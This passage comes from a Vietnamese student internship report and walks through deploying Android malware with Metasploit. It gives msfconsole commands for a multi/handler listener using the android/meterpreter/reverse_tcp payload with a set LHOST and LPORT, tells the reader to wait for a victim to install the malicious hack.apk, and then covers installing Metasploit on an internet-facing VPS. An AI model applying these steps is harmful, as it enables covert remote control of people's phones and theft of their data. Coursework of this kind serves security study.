Chờ một lúc thì msfconsole load xong. Bây giờ ta tạo một handler để bắt tính hiệu truyền về
từ máy bị nhiễm mã độc. Ta gõ các lệnh sau ở Terminal.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.4 (ip trùng với địa chỉ ip lúc tạo file hack.apk)
set lport 5784 (port trùng với port lúc tạo file hack.apk)
exploit

Bây giờ ta chỉ việc chờ cho máy nhiễm file mã độc mà ta tạo ở trên, thì nhƣ vậy là ta
đã xong phần cách triển khai mã độc xâm nhập vào android.
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 16

2. Làm trên sever VPS (môi trường Internet)
a. Cài đặt Metasploit trên VPS
Để cài đặt Metasploit trên VPS, trƣớc tiên ta tải file cài đặt Metsploit về từ trang chủ
. Ta chọn phiên bản
Metasploit Community. Click vào DOWNLOAD METASPLOIT COMMUNITY để
tiến hành tải Metasploit về.

Sau khi đã tải file cài đặt về ta mở file cài đặt Metasploit lên và tiến hành cài đặt, ở
màn hình cài đặt mở lên ta Click Next, đến bƣớc tiếp theo ta chọn I accept the
agreement rồi click Next .
BÁO CÁO THỰC TẬP GVHD: VÕ ĐỖ THẮNG

SVTT: BÙI TỐ LUÂN 17


Bƣớc tiếp theo ta chọn thƣ mục cài đặt cho Metasploit, ta có thể để mặc định, rồi
click Next, tiếp tục click Next lần nữa.

Đến đây ta nhập SLL Port cho Metasploit, và ta chỉ cần để mặc định rồi click Next,
đến tiếp bƣớc nữa ta nhận vào tên Server Name (ta để mặc định là localhost), tại khung
Days of validity ta để mặc định rồi check vào Yes, trust certificate , sau đó ta click
Next
Bƣớc tiếp ta click vào Next để tiến hành cài đặt Metasploit, Sau khi chờ cài đặt xong
ta click Finish để hoàn tất quá trình cài đặt Metasploit.

×